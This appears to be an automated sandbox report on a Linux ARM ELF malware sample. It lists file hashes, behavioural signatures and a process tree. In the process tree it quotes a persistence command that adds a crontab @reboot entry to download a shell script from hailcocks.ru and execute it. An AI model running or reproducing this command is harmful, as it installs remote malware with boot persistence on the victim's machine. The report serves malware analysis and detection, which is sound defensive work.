Analysis

  • max time kernel: 144s
  • max time network: 136s
  • platform: debian-9_armhf
  • resource: debian9-armhf-20240611-en
  • resource tags:
    • arch: armhf
    • image: debian9-armhf-20240611-en
    • kernel: 4.9.0-13-armmp-lpae
    • locale: en-us
    • os: debian-9-armhf
    • system
  • submitted: 27-10-2024 02:50

General

  • Target: bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf
  • Size: 75KB
  • MD5: 87f114f7f6a5830d45ffe101ccd0de1c
  • SHA1: 1156d361e2050a882e4b224410682e116575588d
  • SHA256: bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62
  • SHA512: 1cbf6c2276bd0431b4237f7543ae3ba3eb415df5a2de45558ff5a87d5af95752f2e5406661a210cb2d294de2a8322029d6631af851ea65b2b074fa7a91a95b3b
  • SSDEEP: 1536:WukDLaSfqMHzfdFM9IMksqL7dX4DgydyDXvW:WukSSfzHrrM9IPjID0W

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Renames itself 1 IoCs
  • Unexpected DNS network traffic destination 3 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Changes its process name 1 IoCs
  • Reads runtime system information 3 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf (PID 644)
    Command line: /tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf
    • Renames itself
    • Changes its process name
    • Reads runtime system information
    • /bin/sh (PID 645)
      Command line: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      • File and Directory Permissions Modification
      • /usr/bin/crontab (PID 648)
        Command line: crontab -
        • Creates/modifies Cron job
        • Reads runtime system information
      • /usr/bin/crontab (PID 649)
        Command line: crontab -l
        • Reads runtime system information

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /var/spool/cron/crontabs/tmp.ObcLt0
    • Filesize: 306B
    • MD5: 156ee72da2df4c852058bb0a4d6a1c57
    • SHA1: ddcde4860a652c8988f3cf45cb742ae199a5c4fa
    • SHA256: 22d5d14166a842a855fecf8daa2962429aac0da074dff2c5fd31a157d2e3e3f6
    • SHA512: 94c14c17c65e0a2c0f1c6cbe79d480ed336c6f79ac4562ba166da7ebf765f8703502bdc8372d5079d818035efe1d7f18c16b0ab94b6e6b155dd9fd77cce78d64